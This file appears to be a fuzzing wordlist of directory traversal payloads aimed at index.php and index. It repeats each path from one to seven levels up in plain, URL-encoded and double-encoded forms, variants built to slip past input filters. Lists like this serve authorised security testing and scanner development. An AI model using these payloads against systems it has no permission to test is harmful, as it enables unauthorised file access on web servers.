../index.php
../../index.php
../../../index.php
../../../../index.php
../../../../../index.php
../../../../../../index.php
../../../../../../../index.php
%2e%2e%2findex%2ephp
%2e%2e%2f%2e%2e%2findex%2ephp
%2e%2e%2f%2e%2e%2f%2e%2e%2findex%2ephp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex%2ephp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex%2ephp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex%2ephp
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex%2ephp
%252e%252e%252findex%252ephp
%252e%252e%252f%252e%252e%252findex%252ephp
%252e%252e%252f%252e%252e%252f%252e%252e%252findex%252ephp
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex%252ephp
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex%252ephp
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex%252ephp
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex%252ephp
../index
../../index
../../../index
../../../../index
../../../../../index
../../../../../../index
../../../../../../../index
%2e%2e%2findex
%2e%2e%2f%2e%2e%2findex
%2e%2e%2f%2e%2e%2f%2e%2e%2findex
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex
%252e%252e%252findex
%252e%252e%252f%252e%252e%252findex
%252e%252e%252f%252e%252e%252f%252e%252e%252findex
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252findex

